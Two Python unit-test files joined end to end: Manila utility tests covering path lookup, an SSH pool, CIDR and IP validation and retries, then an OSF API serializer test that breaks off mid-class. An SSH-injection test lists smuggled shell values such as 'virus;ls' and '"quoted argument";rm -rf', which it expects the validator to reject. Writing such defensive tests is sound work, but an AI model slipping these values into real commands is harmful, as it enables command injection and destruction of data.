self.assertEqual([{'c': None}], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': {'c': None}}}, {'a': {'b': None}}]
self.assertEqual([{'b': {'c': None}}, {'b': None}], f(input, "a"))
self.assertEqual([{'c': None}], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
def test_does_select(self):
f = utils.get_from_path
input = [{'a': 'a_1'}]
self.assertEqual(['a_1'], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': 'b_1'}}]
self.assertEqual([{'b': 'b_1'}], f(input, "a"))
self.assertEqual(['b_1'], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': {'c': 'c_1'}}}]
self.assertEqual([{'b': {'c': 'c_1'}}], f(input, "a"))
self.assertEqual([{'c': 'c_1'}], f(input, "a/b"))
self.assertEqual(['c_1'], f(input, "a/b/c"))
input = [{'a': {'b': {'c': 'c_1'}}}, {'a': None}]
self.assertEqual([{'b': {'c': 'c_1'}}], f(input, "a"))
self.assertEqual([{'c': 'c_1'}], f(input, "a/b"))
self.assertEqual(['c_1'], f(input, "a/b/c"))
input = [{'a': {'b': {'c': 'c_1'}}},
{'a': {'b': None}}]
self.assertEqual([{'b': {'c': 'c_1'}}, {'b': None}], f(input, "a"))
self.assertEqual([{'c': 'c_1'}], f(input, "a/b"))
self.assertEqual(['c_1'], f(input, "a/b/c"))
input = [{'a': {'b': {'c': 'c_1'}}},
{'a': {'b': {'c': 'c_2'}}}]
self.assertEqual([{'b': {'c': 'c_1'}}, {'b': {'c': 'c_2'}}],
f(input, "a"))
self.assertEqual([{'c': 'c_1'}, {'c': 'c_2'}], f(input, "a/b"))
self.assertEqual(['c_1', 'c_2'], f(input, "a/b/c"))
self.assertEqual([], f(input, "a/b/c/d"))
self.assertEqual([], f(input, "c/a/b/d"))
self.assertEqual([], f(input, "i/r/t"))
def test_flattens_lists(self):
f = utils.get_from_path
input = [{'a': [1, 2, 3]}]
self.assertEqual([1, 2, 3], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': [1, 2, 3]}}]
self.assertEqual([{'b': [1, 2, 3]}], f(input, "a"))
self.assertEqual([1, 2, 3], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': [1, 2, 3]}}, {'a': {'b': [4, 5, 6]}}]
self.assertEqual([1, 2, 3, 4, 5, 6], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': [{'b': [1, 2, 3]}, {'b': [4, 5, 6]}]}]
self.assertEqual([1, 2, 3, 4, 5, 6], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': [1, 2, {'b': 'b_1'}]}]
self.assertEqual([1, 2, {'b': 'b_1'}], f(input, "a"))
self.assertEqual(['b_1'], f(input, "a/b"))
def test_bad_xpath(self):
f = utils.get_from_path
self.assertRaises(exception.Error, f, [], None)
self.assertRaises(exception.Error, f, [], "")
self.assertRaises(exception.Error, f, [], "/")
self.assertRaises(exception.Error, f, [], "/a")
self.assertRaises(exception.Error, f, [], "/a/")
self.assertRaises(exception.Error, f, [], "//")
self.assertRaises(exception.Error, f, [], "//a")
self.assertRaises(exception.Error, f, [], "a//a")
self.assertRaises(exception.Error, f, [], "a//a/")
self.assertRaises(exception.Error, f, [], "a/a/")
def test_real_failure1(self):
# Real world failure case...
# We weren't coping when the input was a Dictionary instead of a List
# This led to test_accepts_dictionaries
f = utils.get_from_path
inst = {'fixed_ip': {'floating_ips': [{'address': '1.2.3.4'}],
'address': '192.168.0.3'},
'hostname': ''}
private_ips = f(inst, 'fixed_ip/address')
public_ips = f(inst, 'fixed_ip/floating_ips/address')
self.assertEqual(['192.168.0.3'], private_ips)
self.assertEqual(['1.2.3.4'], public_ips)
def test_accepts_dictionaries(self):
f = utils.get_from_path
input = {'a': [1, 2, 3]}
self.assertEqual([1, 2, 3], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = {'a': {'b': [1, 2, 3]}}
self.assertEqual([{'b': [1, 2, 3]}], f(input, "a"))
self.assertEqual([1, 2, 3], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = {'a': [{'b': [1, 2, 3]}, {'b': [4, 5, 6]}]}
self.assertEqual([1, 2, 3, 4, 5, 6], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = {'a': [1, 2, {'b': 'b_1'}]}
self.assertEqual([1, 2, {'b': 'b_1'}], f(input, "a"))
self.assertEqual(['b_1'], f(input, "a/b"))
@ddt.ddt
class GenericUtilsTestCase(test.TestCase):
def test_read_cached_file(self):
cache_data = {"data": 1123, "mtime": 1}
with mock.patch.object(os.path, "getmtime", mock.Mock(return_value=1)):
data = utils.read_cached_file("/this/is/a/fake", cache_data)
self.assertEqual(cache_data["data"], data)
os.path.getmtime.assert_called_once_with("/this/is/a/fake")
def test_read_modified_cached_file(self):
with mock.patch.object(os.path, "getmtime", mock.Mock(return_value=2)):
fake_contents = "lorem ipsum"
fake_file = mock.Mock()
fake_file.read = mock.Mock(return_value=fake_contents)
fake_context_manager = mock.Mock()
fake_context_manager.__enter__ = mock.Mock(return_value=fake_file)
fake_context_manager.__exit__ = mock.Mock()
with mock.patch.object(
builtins, 'open',
mock.Mock(return_value=fake_context_manager)):
cache_data = {"data": 1123, "mtime": 1}
self.reload_called = False
def test_reload(reloaded_data):
self.assertEqual(reloaded_data, fake_contents)
self.reload_called = True
data = utils.read_cached_file("/this/is/a/fake",
cache_data,
reload_func=test_reload)
self.assertEqual(data, fake_contents)
self.assertTrue(self.reload_called)
fake_file.read.assert_called_once_with()
fake_context_manager.__enter__.assert_any_call()
builtins.open.assert_called_once_with("/this/is/a/fake")
os.path.getmtime.assert_called_once_with("/this/is/a/fake")
def test_read_file_as_root(self):
def fake_execute(*args, **kwargs):
if args[1] == 'bad':
raise exception.ProcessExecutionError
return 'fakecontents', None
self.mock_object(utils, 'execute', fake_execute)
contents = utils.read_file_as_root('good')
self.assertEqual(contents, 'fakecontents')
self.assertRaises(exception.FileNotFound,
utils.read_file_as_root, 'bad')
def test_temporary_chown(self):
def fake_execute(*args, **kwargs):
if args[0] == 'chown':
fake_execute.uid = args[1]
self.mock_object(utils, 'execute', fake_execute)
with tempfile.NamedTemporaryFile() as f:
with utils.temporary_chown(f.name, owner_uid=2):
self.assertEqual(fake_execute.uid, 2)
self.assertEqual(fake_execute.uid, os.getuid())
def test_service_is_up(self):
fts_func = datetime.datetime.fromtimestamp
fake_now = 1000
down_time = 5
self.flags(service_down_time=down_time)
with mock.patch.object(timeutils, 'utcnow',
mock.Mock(return_value=fts_func(fake_now))):
# Up (equal)
service = {'updated_at': fts_func(fake_now - down_time),
'created_at': fts_func(fake_now - down_time)}
result = utils.service_is_up(service)
self.assertTrue(result)
timeutils.utcnow.assert_called_once_with()
with mock.patch.object(timeutils, 'utcnow',
mock.Mock(return_value=fts_func(fake_now))):
# Up
service = {'updated_at': fts_func(fake_now - down_time + 1),
'created_at': fts_func(fake_now - down_time + 1)}
result = utils.service_is_up(service)
self.assertTrue(result)
timeutils.utcnow.assert_called_once_with()
with mock.patch.object(timeutils, 'utcnow',
mock.Mock(return_value=fts_func(fake_now))):
# Down
service = {'updated_at': fts_func(fake_now - down_time - 1),
'created_at': fts_func(fake_now - down_time - 1)}
result = utils.service_is_up(service)
self.assertFalse(result)
timeutils.utcnow.assert_called_once_with()
def test_is_ipv6_configured0(self):
fake_fd = mock.Mock()
fake_fd.read.return_value = 'test'
with mock.patch('six.moves.builtins.open',
mock.Mock(return_value=fake_fd)) as open:
self.assertTrue(utils.is_ipv6_configured())
open.assert_called_once_with('/proc/net/if_inet6')
fake_fd.read.assert_called_once_with(32)
def test_is_ipv6_configured1(self):
fake_fd = mock.Mock()
fake_fd.read.return_value = ''
with mock.patch(
'six.moves.builtins.open', mock.Mock(return_value=fake_fd)):
self.assertFalse(utils.is_ipv6_configured())
def test_is_ipv6_configured2(self):
with mock.patch('six.moves.builtins.open',
mock.Mock(side_effect=IOError(
errno.ENOENT, 'Fake no such file error.'))):
self.assertFalse(utils.is_ipv6_configured())
def test_is_ipv6_configured3(self):
with mock.patch('six.moves.builtins.open',
mock.Mock(side_effect=IOError(
errno.EPERM, 'Fake no such file error.'))):
self.assertRaises(IOError, utils.is_ipv6_configured)
def test_is_eventlet_bug105(self):
fake_dns = mock.Mock()
fake_dns.getaddrinfo.side_effect = socket.gaierror(errno.EBADF)
with mock.patch.dict('sys.modules', {
'eventlet.support.greendns': fake_dns}):
self.assertTrue(utils.is_eventlet_bug105())
self.assertTrue(fake_dns.getaddrinfo.called)
def test_is_eventlet_bug105_neg(self):
fake_dns = mock.Mock()
fake_dns.getaddrinfo.return_value = [
(socket.AF_INET6, socket.SOCK_STREAM, 0, '', (u'127.0.0.1', 80)),
]
with mock.patch.dict('sys.modules', {
'eventlet.support.greendns': fake_dns}):
self.assertFalse(utils.is_eventlet_bug105())
fake_dns.getaddrinfo.assert_called_once_with('::1', 80)
@ddt.data(['ssh', '-D', 'my_name@name_of_remote_computer'],
['echo', '"quoted arg with space"'],
['echo', "'quoted arg with space'"])
def test_check_ssh_injection(self, cmd):
cmd_list = cmd
self.assertIsNone(utils.check_ssh_injection(cmd_list))
@ddt.data(['ssh', 'my_name@ name_of_remote_computer'],
['||', 'my_name@name_of_remote_computer'],
['cmd', 'virus;ls'],
['cmd', '"arg\"withunescaped"'],
['cmd', 'virus;"quoted argument"'],
['echo', '"quoted argument";rm -rf'],
['echo', "'quoted argument `rm -rf`'"],
['echo', '"quoted";virus;"quoted"'],
['echo', '"quoted";virus;\'quoted\''])
def test_check_ssh_injection_on_error0(self, cmd):
self.assertRaises(exception.SSHInjectionThreat,
utils.check_ssh_injection, cmd)
class MonkeyPatchTestCase(test.TestCase):
"""Unit test for utils.monkey_patch()."""
def setUp(self):
super(MonkeyPatchTestCase, self).setUp()
self.example_package = 'manila.tests.monkey_patch_example.'
self.flags(
monkey_patch=True,
monkey_patch_modules=[self.example_package + 'example_a' + ':'
+ self.example_package
+ 'example_decorator'])
def test_monkey_patch(self):
utils.monkey_patch()
manila.tests.monkey_patch_example.CALLED_FUNCTION = []
from manila.tests.monkey_patch_example import example_a
from manila.tests.monkey_patch_example import example_b
self.assertEqual('Example function', example_a.example_function_a())
exampleA = example_a.ExampleClassA()
exampleA.example_method()
ret_a = exampleA.example_method_add(3, 5)
self.assertEqual(ret_a, 8)
self.assertEqual('Example function', example_b.example_function_b())
exampleB = example_b.ExampleClassB()
exampleB.example_method()
ret_b = exampleB.example_method_add(3, 5)
self.assertEqual(ret_b, 8)
package_a = self.example_package + 'example_a.'
self.assertTrue(package_a + 'example_function_a'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
self.assertTrue(package_a + 'ExampleClassA.example_method'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
self.assertTrue(package_a + 'ExampleClassA.example_method_add'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
package_b = self.example_package + 'example_b.'
self.assertFalse(package_b + 'example_function_b'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
self.assertFalse(package_b + 'ExampleClassB.example_method'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
self.assertFalse(package_b + 'ExampleClassB.example_method_add'
in manila.tests.monkey_patch_example.CALLED_FUNCTION)
class FakeSSHClient(object):
def __init__(self):
self.id = uuid.uuid4()
self.transport = FakeTransport()
def set_missing_host_key_policy(self, policy):
pass
def connect(self, ip, port=22, username=None, password=None,
key_filename=None, look_for_keys=None, timeout=10):
pass
def get_transport(self):
return self.transport
def close(self):
pass
def __call__(self, *args, **kwargs):
pass
class FakeSock(object):
def settimeout(self, timeout):
pass
class FakeTransport(object):
def __init__(self):
self.active = True
self.sock = FakeSock()
def set_keepalive(self, timeout):
pass
def is_active(self):
return self.active
class SSHPoolTestCase(test.TestCase):
"""Unit test for SSH Connection Pool."""
def test_single_ssh_connect(self):
with mock.patch.object(paramiko, "SSHClient",
mock.Mock(return_value=FakeSSHClient())):
sshpool = utils.SSHPool("127.0.0.1", 22, 10, "test",
password="test", min_size=1, max_size=1)
with sshpool.item() as ssh:
first_id = ssh.id
with sshpool.item() as ssh:
second_id = ssh.id
self.assertEqual(first_id, second_id)
paramiko.SSHClient.assert_called_once_with()
def test_create_ssh_with_password(self):
fake_ssh_client = mock.Mock()
ssh_pool = utils.SSHPool("127.0.0.1", 22, 10, "test",
password="test")
with mock.patch.object(paramiko, "SSHClient",
return_value=fake_ssh_client):
ssh_pool.create()
fake_ssh_client.connect.assert_called_once_with(
"127.0.0.1", port=22, username="test",
password="test", key_filename=None, look_for_keys=False,
timeout=10)
def test_create_ssh_with_key(self):
path_to_private_key = "/fakepath/to/privatekey"
fake_ssh_client = mock.Mock()
ssh_pool = utils.SSHPool("127.0.0.1", 22, 10, "test",
privatekey="/fakepath/to/privatekey")
with mock.patch.object(paramiko, "SSHClient",
return_value=fake_ssh_client):
ssh_pool.create()
fake_ssh_client.connect.assert_called_once_with(
"127.0.0.1", port=22, username="test", password=None,
key_filename=path_to_private_key, look_for_keys=False,
timeout=10)
def test_create_ssh_with_nothing(self):
fake_ssh_client = mock.Mock()
ssh_pool = utils.SSHPool("127.0.0.1", 22, 10, "test")
with mock.patch.object(paramiko, "SSHClient",
return_value=fake_ssh_client):
ssh_pool.create()
fake_ssh_client.connect.assert_called_once_with(
"127.0.0.1", port=22, username="test", password=None,
key_filename=None, look_for_keys=True,
timeout=10)
def test_create_ssh_error_connecting(self):
attrs = {'connect.side_effect': paramiko.SSHException, }
fake_ssh_client = mock.Mock(**attrs)
ssh_pool = utils.SSHPool("127.0.0.1", 22, 10, "test")
with mock.patch.object(paramiko, "SSHClient",
return_value=fake_ssh_client):
self.assertRaises(exception.SSHException, ssh_pool.create)
fake_ssh_client.connect.assert_called_once_with(
"127.0.0.1", port=22, username="test", password=None,
key_filename=None, look_for_keys=True,
timeout=10)
def test_closed_reopend_ssh_connections(self):
with mock.patch.object(paramiko, "SSHClient",
mock.Mock(return_value=FakeSSHClient())):
sshpool = utils.SSHPool("127.0.0.1", 22, 10, "test",
password="test", min_size=1, max_size=2)
with sshpool.item() as ssh:
first_id = ssh.id
with sshpool.item() as ssh:
second_id = ssh.id
# Close the connection and test for a new connection
ssh.get_transport().active = False
self.assertEqual(first_id, second_id)
paramiko.SSHClient.assert_called_once_with()
# Expected new ssh pool
with mock.patch.object(paramiko, "SSHClient",
mock.Mock(return_value=FakeSSHClient())):
with sshpool.item() as ssh:
third_id = ssh.id
self.assertNotEqual(first_id, third_id)
paramiko.SSHClient.assert_called_once_with()
class CidrToNetmaskTestCase(test.TestCase):
"""Unit test for cidr to netmask."""
def test_cidr_to_netmask_01(self):
cidr = '10.0.0.0/0'
expected_netmask = '0.0.0.0'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_02(self):
cidr = '10.0.0.0/24'
expected_netmask = '255.255.255.0'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_03(self):
cidr = '10.0.0.0/5'
expected_netmask = '248.0.0.0'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_04(self):
cidr = '10.0.0.0/32'
expected_netmask = '255.255.255.255'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_05(self):
cidr = '10.0.0.1'
expected_netmask = '255.255.255.255'
result = utils.cidr_to_netmask(cidr)
self.assertEqual(expected_netmask, result)
def test_cidr_to_netmask_invalid_01(self):
cidr = '10.0.0.0/33'
self.assertRaises(exception.InvalidInput, utils.cidr_to_netmask, cidr)
def test_cidr_to_netmask_invalid_02(self):
cidr = ''
self.assertRaises(exception.InvalidInput, utils.cidr_to_netmask, cidr)
def test_cidr_to_netmask_invalid_03(self):
cidr = '10.0.0.0/33'
self.assertRaises(exception.InvalidInput, utils.cidr_to_netmask, cidr)
def test_cidr_to_netmask_invalid_04(self):
cidr = '10.0.0.555/33'
self.assertRaises(exception.InvalidInput, utils.cidr_to_netmask, cidr)
@ddt.ddt
class IsValidIPVersion(test.TestCase):
"""Test suite for function 'is_valid_ip_address'."""
@ddt.data('0.0.0.0', '255.255.255.255', '192.168.0.1')
def test_valid_v4(self, addr):
for vers in (4, '4'):
self.assertTrue(utils.is_valid_ip_address(addr, vers))
@ddt.data(
'2001:cdba:0000:0000:0000:0000:3257:9652',
'2001:cdba:0:0:0:0:3257:9652',
'2001:cdba::3257:9652')
def test_valid_v6(self, addr):
for vers in (6, '6'):
self.assertTrue(utils.is_valid_ip_address(addr, vers))
@ddt.data(
{'addr': '1.1.1.1', 'vers': 3},
{'addr': '1.1.1.1', 'vers': 5},
{'addr': '1.1.1.1', 'vers': 7},
{'addr': '2001:cdba::3257:9652', 'vers': '3'},
{'addr': '2001:cdba::3257:9652', 'vers': '5'},
{'addr': '2001:cdba::3257:9652', 'vers': '7'})
@ddt.unpack
def test_provided_invalid_version(self, addr, vers):
self.assertRaises(
exception.ManilaException, utils.is_valid_ip_address, addr, vers)
def test_provided_none_version(self):
self.assertRaises(TypeError, utils.is_valid_ip_address, '', None)
@ddt.data(None, 'fake', '1.1.1.1')
def test_provided_invalid_v6_address(self, addr):
for vers in (6, '6'):
self.assertFalse(utils.is_valid_ip_address(addr, vers))
@ddt.data(None, 'fake', '255.255.255.256', '2001:cdba::3257:9652')
def test_provided_invalid_v4_address(self, addr):
for vers in (4, '4'):
self.assertFalse(utils.is_valid_ip_address(addr, vers))
class Comparable(utils.ComparableMixin):
def __init__(self, value):
self.value = value
def _cmpkey(self):
return self.value
class TestComparableMixin(test.TestCase):
def setUp(self):
super(TestComparableMixin, self).setUp()
self.one = Comparable(1)
self.two = Comparable(2)
def test_lt(self):
self.assertTrue(self.one < self.two)
self.assertFalse(self.two < self.one)
self.assertFalse(self.one < self.one)
def test_le(self):
self.assertTrue(self.one <= self.two)
self.assertFalse(self.two <= self.one)
self.assertTrue(self.one <= self.one)
def test_eq(self):
self.assertFalse(self.one == self.two)
self.assertFalse(self.two == self.one)
self.assertTrue(self.one == self.one)
def test_ge(self):
self.assertFalse(self.one >= self.two)
self.assertTrue(self.two >= self.one)
self.assertTrue(self.one >= self.one)
def test_gt(self):
self.assertFalse(self.one > self.two)
self.assertTrue(self.two > self.one)
self.assertFalse(self.one > self.one)
def test_ne(self):
self.assertTrue(self.one != self.two)
self.assertTrue(self.two != self.one)
self.assertFalse(self.one != self.one)
def test_compare(self):
self.assertEqual(NotImplemented,
self.one._compare(1, self.one._cmpkey))
class TestRetryDecorator(test.TestCase):
def setUp(self):
super(TestRetryDecorator, self).setUp()
def test_no_retry_required(self):
self.counter = 0
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval=2,
retries=3,
backoff_rate=2)
def succeeds():
self.counter += 1
return 'success'
ret = succeeds()
self.assertFalse(mock_sleep.called)
self.assertEqual('success', ret)
self.assertEqual(1, self.counter)
def test_no_retry_required_random(self):
self.counter = 0
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval=2,
retries=3,
backoff_rate=2,
wait_random=True)
def succeeds():
self.counter += 1
return 'success'
ret = succeeds()
self.assertFalse(mock_sleep.called)
self.assertEqual('success', ret)
self.assertEqual(1, self.counter)
def test_retries_once_random(self):
self.counter = 0
interval = 2
backoff_rate = 2
retries = 3
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval,
retries,
backoff_rate,
wait_random=True)
def fails_once():
self.counter += 1
if self.counter < 2:
raise exception.ManilaException(data='fake')
else:
return 'success'
ret = fails_once()
self.assertEqual('success', ret)
self.assertEqual(2, self.counter)
self.assertEqual(1, mock_sleep.call_count)
self.assertTrue(mock_sleep.called)
def test_retries_once(self):
self.counter = 0
interval = 2
backoff_rate = 2
retries = 3
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval,
retries,
backoff_rate)
def fails_once():
self.counter += 1
if self.counter < 2:
raise exception.ManilaException(data='fake')
else:
return 'success'
ret = fails_once()
self.assertEqual('success', ret)
self.assertEqual(2, self.counter)
self.assertEqual(1, mock_sleep.call_count)
mock_sleep.assert_called_with(interval * backoff_rate)
def test_limit_is_reached(self):
self.counter = 0
retries = 3
interval = 2
backoff_rate = 4
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException,
interval,
retries,
backoff_rate)
def always_fails():
self.counter += 1
raise exception.ManilaException(data='fake')
self.assertRaises(exception.ManilaException,
always_fails)
self.assertEqual(retries, self.counter)
expected_sleep_arg = []
for i in range(retries):
if i > 0:
interval *= backoff_rate
expected_sleep_arg.append(float(interval))
mock_sleep.assert_has_calls(map(mock.call, expected_sleep_arg))
def test_wrong_exception_no_retry(self):
with mock.patch.object(time, 'sleep') as mock_sleep:
@utils.retry(exception.ManilaException)
def raise_unexpected_error():
raise ValueError("value error")
self.assertRaises(ValueError, raise_unexpected_error)
self.assertFalse(mock_sleep.called)
|
|
# -*- coding: utf-8 -*-
import httplib as http
import importlib
import pkgutil
import pytest
from pytz import utc
from datetime import datetime
import urllib
from nose.tools import * # flake8: noqa
import re
from tests.base import ApiTestCase, DbTestCase
from osf_tests import factories
from tests.utils import make_drf_request_with_version
from api.base.settings.defaults import API_BASE
from api.base.serializers import JSONAPISerializer, BaseAPISerializer
from api.base import serializers as base_serializers
from api.nodes.serializers import NodeSerializer, RelationshipField
from api.waffle.serializers import WaffleSerializer, BaseWaffleSerializer
from api.registrations.serializers import RegistrationSerializer
SER_MODULES = []
for loader, name, _ in pkgutil.iter_modules(['api']):
if name != 'base' and name != 'test':
try:
SER_MODULES.append(
importlib.import_module(
'api.{}.serializers'.format(name)
)
)
except ImportError:
pass
SER_CLASSES = []
for mod in SER_MODULES:
for name, val in mod.__dict__.items():
try:
if issubclass(val, BaseAPISerializer):
if 'JSONAPI' in name or 'BaseAPI' in name:
continue
SER_CLASSES.append(val)
except TypeError:
pass
class FakeModel(object):
def null_field(self):
return None
def valued_field(self):
return 'Some'
null = None
foo = 'bar'
pk = '1234'
class FakeSerializer(base_serializers.JSONAPISerializer):
class Meta:
type_ = 'foos'
links = base_serializers.LinksField({
'null_field': 'null_field',
'valued_field': 'valued_field',
})
null_link_field = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<null>'},
)
valued_link_field = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<foo>'},
)
def null_field(*args, **kwargs):
return None
def valued_field(*args, **kwargs):
return 'http://foo.com'
class TestSerializerMetaType(ApiTestCase):
def test_expected_serializers_have_meta_types(self):
for ser in SER_CLASSES:
assert hasattr(
ser, 'Meta'
), 'Serializer {} has no Meta'.format(ser)
assert hasattr(
ser.Meta, 'type_'
), 'Serializer {} has no Meta.type_'.format(ser)
class TestNodeSerializerAndRegistrationSerializerDifferences(ApiTestCase):
"""
All fields on the Node Serializer other than the few we can serialize for withdrawals must be redeclared on the
Registration Serializer and wrapped in HideIfWithdrawal
HideIfRegistration fields should not be serialized on registrations.
"""
def setUp(self):
super(TestNodeSerializerAndRegistrationSerializerDifferences, self).setUp()
self.node = factories.ProjectFactory(is_public=True)
self.registration = factories.RegistrationFactory(
project=self.node, is_public=True)
self.url = '/{}nodes/{}/'.format(API_BASE, self.node._id)
self.reg_url = '/{}registrations/{}/'.format(
API_BASE, self.registration._id)
def test_registration_serializer(self):
# fields that are visible for withdrawals
visible_on_withdrawals = [
'contributors',
'implicit_contributors',
'date_created',
'date_modified',
'description',
'id',
'links',
'registration',
'title',
'type',
'current_user_can_comment',
'current_user_is_contributor',
'preprint',
'subjects']
# fields that do not appear on registrations
non_registration_fields = ['registrations', 'draft_registrations', 'templated_by_count', 'settings']
for field in NodeSerializer._declared_fields:
assert_in(field, RegistrationSerializer._declared_fields)
reg_field = RegistrationSerializer._declared_fields[field]
if field not in visible_on_withdrawals and field not in non_registration_fields:
assert_true(
isinstance(reg_field, base_serializers.HideIfWithdrawal) or
isinstance(reg_field, base_serializers.ShowIfVersion) or
isinstance(reg_field, base_serializers.ShowIfAdminScopeOrAnonymous)
)
def test_hide_if_registration_fields(self):
node_res = self.app.get(self.url)
node_relationships = node_res.json['data']['relationships']
registration_res = self.app.get(self.reg_url)
registration_relationships = registration_res.json['data']['relationships']
hide_if_registration_fields = [
field for field in NodeSerializer._declared_fields if isinstance(
NodeSerializer._declared_fields[field],
base_serializers.HideIfRegistration)]
for field in hide_if_registration_fields:
assert_in(field, node_relationships)
assert_not_in(field, registration_relationships)
class TestNullLinks(ApiTestCase):
def test_null_links_are_omitted(self):
req = make_drf_request_with_version(version='2.0')
rep = FakeSerializer(FakeModel, context={'request': req}).data['data']
assert_not_in('null_field', rep['links'])
assert_in('valued_field', rep['links'])
assert_not_in('null_link_field', rep['relationships'])
class TestApiBaseSerializers(ApiTestCase):
def setUp(self):
super(TestApiBaseSerializers, self).setUp()
self.user = factories.AuthUserFactory()
self.auth = factories.Auth(self.user)
self.node = factories.ProjectFactory(is_public=True)
for i in range(5):
factories.ProjectFactory(is_public=True, parent=self.node)
self.linked_node = factories.NodeFactory(
creator=self.user, is_public=True)
self.node.add_pointer(self.linked_node, auth=self.auth)
self.url = '/{}nodes/{}/'.format(API_BASE, self.node._id)
def test_serializers_have_get_absolute_url_method(self):
serializers = JSONAPISerializer.__subclasses__()
base_get_absolute_url = JSONAPISerializer.get_absolute_url
for serializer in serializers:
# Waffle endpoints are nonstandard
if serializer == WaffleSerializer or serializer == BaseWaffleSerializer:
continue
if not re.match('^(api_test|test).*', serializer.__module__):
assert hasattr(
serializer, 'get_absolute_url'
), 'No get_absolute_url method'
assert_not_equal(
serializer.get_absolute_url,
base_get_absolute_url
)
def test_counts_not_included_in_link_fields_by_default(self):
res = self.app.get(self.url)
relationships = res.json['data']['relationships']
for relation in relationships.values():
if relation == {'data': None}:
continue
if isinstance(relation, list):
for item in relation:
link = item['links'].values()[0]
link_meta = link.get('meta', {})
assert_not_in('count', link_meta)
else:
link = relation['links'].values()[0]
link_meta = link.get('meta', {})
assert_not_in('count', link_meta)
def test_counts_included_in_link_fields_with_related_counts_query_param(
self):
res = self.app.get(self.url, params={'related_counts': True})
relationships = res.json['data']['relationships']
for key, relation in relationships.items():
if relation == {}:
continue
field = NodeSerializer._declared_fields[key]
if getattr(field, 'field', None):
field = field.field
related_meta = getattr(field, 'related_meta', {})
if related_meta and related_meta.get('count', False):
link = relation['links'].values()[0]
assert_in('count', link['meta'], field)
def test_related_counts_excluded_query_param_false(self):
res = self.app.get(self.url, params={'related_counts': False})
relationships = res.json['data']['relationships']
for relation in relationships.values():
if relation == {'data': None}:
continue
if isinstance(relation, list):
for item in relation:
link = item['links'].values()[0]
link_meta = link.get('meta', {})
assert_not_in('count', link_meta)
else:
link = relation['links'].values()[0]
link_meta = link.get('meta', {})
assert_not_in('count', link_meta)
def test_invalid_related_counts_value_raises_bad_request(self):
res = self.app.get(
self.url,
params={'related_counts': 'fish'},
expect_errors=True
)
assert_equal(res.status_code, http.BAD_REQUEST)
def test_invalid_embed_value_raise_bad_request(self):
res = self.app.get(
self.url,
params={'embed': 'foo'},
expect_errors=True
)
assert_equal(res.status_code, http.BAD_REQUEST)
assert_equal(
res.json['errors'][0]['detail'],
'The following fields are not embeddable: foo'
)
def test_embed_does_not_remove_relationship(self):
res = self.app.get(self.url, params={'embed': 'root'})
assert_equal(res.status_code, 200)
assert_in(
self.url,
res.json['data']['relationships']['root']['links']['related']['href']
)
def test_counts_included_in_children_field_with_children_related_counts_query_param(
self):
res = self.app.get(self.url, params={'related_counts': 'children'})
relationships = res.json['data']['relationships']
for key, relation in relationships.items():
if relation == {}:
continue
field = NodeSerializer._declared_fields[key]
if getattr(field, 'field', None):
field = field.field
if isinstance(relation, list):
for item in relation:
link = item['links'].values()[0]
related_meta = getattr(field, 'related_meta', {})
if related_meta and related_meta.get('count', False) and key == 'children':
assert_in('count', link['meta'])
else:
assert_not_in('count', link.get('meta', {}))
elif relation != {'data': None}:
link = relation['links'].values()[0]
related_meta = getattr(field, 'related_meta', {})
if related_meta and related_meta.get('count', False) and key == 'children':
assert_in('count', link['meta'])
else:
assert_not_in('count', link.get('meta', {}))
def test_counts_included_in_children_and_contributors_fields_with_field_csv_related_counts_query_param(
self):
res = self.app.get(
self.url,
params={'related_counts': 'children,contributors'}
)
relationships = res.json['data']['relationships']
for key, relation in relationships.items():
if relation == {}:
continue
field = NodeSerializer._declared_fields[key]
if getattr(field, 'field', None):
field = field.field
if isinstance(relation, list):
for item in relation:
link = item['links'].values()[0]
related_meta = getattr(field, 'related_meta', {})
if related_meta and related_meta.get('count', False) and key == 'children' or key == 'contributors':
assert_in('count', link['meta'])
else:
assert_not_in('count', link.get('meta', {}))
elif relation != {'data': None}:
link = relation['links'].values()[0]
related_meta = getattr(field, 'related_meta', {})
if related_meta and related_meta.get('count', False) and key == 'children' or key == 'contributors':
assert_in('count', link['meta'])
else:
assert_not_in('count', link.get('meta', {}))
def test_error_when_requesting_related_counts_for_attribute_field(self):
res = self.app.get(
self.url,
params={'related_counts': 'title'},
expect_errors=True
)
assert_equal(res.status_code, http.BAD_REQUEST)
assert_equal(
res.json['errors'][0]['detail'],
"Acceptable values for the related_counts query param are 'true', 'false', or any of the relationship fields; got 'title'"
)
@pytest.mark.django_db
class TestRelationshipField:
